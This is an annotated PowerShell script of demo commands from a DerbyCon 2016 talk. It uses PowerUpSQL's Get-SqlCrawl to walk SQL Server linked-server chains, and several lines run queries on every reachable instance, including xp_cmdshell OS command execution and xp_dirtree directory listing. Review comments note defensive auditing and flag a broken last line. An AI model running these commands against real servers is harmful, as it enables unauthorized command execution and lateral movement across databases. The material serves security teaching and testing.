DerbyCon2016 - SQL Server Privilege Escalation Demo - Database Links
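# DerbyCon 2016 demo: crawl SQL Server database links with PowerUpSQL's
# Get-SqlServerLinkCrawl. Every command below talks to live SQL Server
# instances; nothing is computed locally. Paths and instance names are the
# ones used in the demo environment.
# (Rendering artifacts "| |" at the end of each line have been removed; they
# would otherwise make every line an "empty pipe element" syntax error.)

# Import the module.
# NOTE(review): the file is Get-SqlServerLinkCrawl.ps1 but the calls below use
# Get-SqlCrawl; presumably that script defines the Get-SqlCrawl function — confirm.
Import-Module C:\PowerUpSQL-master\scripts\Get-SqlServerLinkCrawl.ps1

# Crawling links - with -Export the link paths are shown in the output, and the
# result objects are serialised to crawl2.xml for later review.
Get-SqlCrawl -Verbose -Instance MSSQLSRV04.demo.local\SQLSERVER2014 -Export | Export-Clixml C:\PowerUpSQL-master\crawl2.xml

# Crawling links - this will store link paths in an array so they can be used in different ways.
# NOTE(review): as written this line also pipes straight into Export-Clixml
# (same file as above, so it overwrites it); keeping the objects in an array
# would require assigning the output to a variable instead — confirm intent.
Get-SqlCrawl -Verbose -Instance MSSQLSRV04.demo.local\SQLSERVER2014 | Export-Clixml C:\PowerUpSQL-master\crawl2.xml

# More example commands below from Antti Rantasaari.
# Each one runs the -Query text on every instance reached through the link
# chain; the select on the following lines picks the properties name, version,
# path, links, user, sysadmin and customquery from each returned object.
Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases"
Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" | select name,version,path,links,user,sysadmin,customquery | format-table
# Presumably links that could not be followed come back with name "Broken Link";
# this filter drops them from the table — verify against the module's output.
Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" | where name -ne "Broken Link" | select name,version,path,links,user,sysadmin,customquery | format-table
# OS command execution via xp_cmdshell across the link chain. From a defender's
# view this is the high-signal event of the demo: xp_cmdshell calls arriving
# through a linked-server session should be audited and alerted on, and linked
# servers should not be configured to run with sysadmin rights.
Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "exec master..xp_cmdshell 'whoami'" | format-table
# Directory listing via xp_dirtree; likewise an extended-procedure call worth auditing.
Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "exec xp_dirtree 'c:\temp'" -Export | format-table
# NOTE(review): the trailing `Format` is not a cmdlet on its own and this line
# looks truncated (the lines above end in `format-table`); confirm against the
# original before use. The lowercase "broken link" still matches the entries
# filtered above because -ne is case-insensitive by default in PowerShell.
Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" -Export | where name -ne "broken link" | sort name | Format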